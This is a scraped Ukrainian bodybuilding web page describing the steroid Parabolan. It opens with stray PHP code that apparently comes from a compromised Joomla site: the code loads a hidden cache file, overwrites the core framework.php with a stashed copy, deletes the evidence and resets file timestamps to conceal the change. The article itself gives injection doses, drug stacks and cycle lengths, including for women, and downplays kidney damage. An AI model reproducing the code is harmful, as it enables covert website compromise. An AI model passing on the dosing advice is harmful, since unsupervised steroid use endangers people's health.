$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Параболан | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Параболан

ПараболанПараболан – це відносно молодий стероїд. Фірма "Лабораторіес Негма" поставила його вперше на ринок у Франції в 1980 році. У бодібілдингу та пауерліфтингу це один з найулюбленіших препаратів, і не без причини. Хто ближче розгляне назву основної хімічної речовини цього препарату, зразу побачить схожість з колись популярним стероїдом Фінаджектом. Оскільки Тренболон є базисною речовиною обох цих препаратів, атлети порівнюють "фіна" з "пара". Параболан - сильний, андрогенний стероїд, який має до того ж високу анаболічну якість. Його особливість у тому, що він, на відміну від інших сильних андрогенних стероїдів НЕ ароматизується. Хімічна речовина препарату не перетворюється на естрогени, так що атлетові не доводиться боротися з високою концентрацією естрогену в крові і явищами фемінізації. Хто користується Параболаном, крім того ще і зрозуміє, що в тканинах не відбувається скупчення води. Ці якості роблять Параболан популярним стероїдом для підготовки до змагань. У поєднанні з високобілковою дієтою він дуже ефективний - в даній фазі. Якщо ж вже досягнутий низький відсоток жиру за допомогою малокалорійного харчування, Параболан дає атлетові величезну твердість м'язів. Високо андрогенний вплив запобігає можливому синдрому перетренованості, прискорює регенерацію, а м'язи виглядають повними, мужніми і в той же час з різкими контурами. Параболан дає приймаючим його незвичайний приріст сили, що особливо яскраво виражено при прийомі Параболана в поєднанні з оксандролоном. Оскільки Параболан не притягує воду, не відбувається ніякого різкого збільшення ваги, а ось приріст якісної мускулатури спостерігається. Атлети, які вживають Параболан понад декількох тижнів, розповідають про загальне поліпшення твердості м'язів без дієт. Особливо гарний Параболан в поєднанні з Вінстролом тривалої дії і дає атлетові чіткий приріст солідної, високоякісної мускулатури разом з величезним приростом сили.

Оскільки Параболан, на відміну від Фінаджекта, не є ацетатною версією тренболана, теоретично можлива не така велика кількість ін'єкцій. Фірма-виробник "Лабораторіес Негма", в інструкції по застосуванню препарату, повідомляє, що Параболан можна приймати лише кожні 14 днів, і все ж це жодним чином, не є ефективним способом прийому препарату для атлета. Більшість атлетів вколюють його щонайменше двічі на тиждень. Знаходяться й такі, які в останні 3 - 4 тижні перед змаганнями вколюють собі дві ампули щодня. Доза більшості - 228 мг на тиждень, що відповідає трьом ампулам на тиждень. Досвід показує, що найкращі результати досягаються при дозі - по одній 76 - міліграмовій ампулі кожні 2 - 3 дні. Дуже ефективний набір 76 мг Параболана кожні 2 дні + 50 мг Вінстрола через день або 50 мг тестостеронпропіоната кожні два дні. Атлетів, яких цікавить швидкий приріст маси, часто використовують ще й 30 мг Діанабола в день, а кому більше потрібна якість і сила, додають 25 мг оксандролону на день.

Параболан - не є стероїдом для курсу протягом всього року, оскільки він досить токсичний. Тривалість прийому повинна обмежуватися  максимум 8 тижнів. З'ясувалося, що Параболан дає в першу чергу навантаження на нирки, а не на печінку. Атлети, які приймають його у високих дозах і понад декілька тижнів, часто розповідають про незвично сильне потемніння сечі. У екстремальних випадках, в сечі може з'явитися навіть кров, що чітко говорить про пошкодження нирок. Приймаючим Параболан слід випивати щодня додатково 3 літри води, тому що це допомагає промивати нирки. Оскільки Параболан не викликає ретенції води і солей, підвищення кров'яного тиску теж рідкість. Як при Фінаджекте у багатьох атлетів проявляється агресивна поведінка, причиною чого є сильна андрогенна дію препарату. Цікаво, що акне і випадання волосся дуже рідкісні, причина, мабуть, в тому, що хімічна речовина препарату не перетворюється на дигідротестостерон. В міру припинення прийому препарату спостерігається виразний спад сили, в той час як нарощена мускулатура зберігається довше. Оскільки Параболан знижує вироблення ендогенного тестостерону, радять застосування тестостерон стимулюючих препаратів в кінці курсу прийому препарату.

Новачки в стероїдних курсах не повинні використовувати Параболан. Те ж стосується і жінок. І все ж таки існує достатня кількість атлеток, що приймають Параболан. Перш за все це стосується атлеток великого спорту, що знаходяться у фазі підготовки до змагань. Жінки, приймають не більше 1 ампули на тиждень і обмежуються прийомом препарату в 4 - 5 тижнів. Це допомагає уникнути явищ вірилізації або взагалі звести їх нанівець.
 
Статті СТЕРОЇДИ Параболан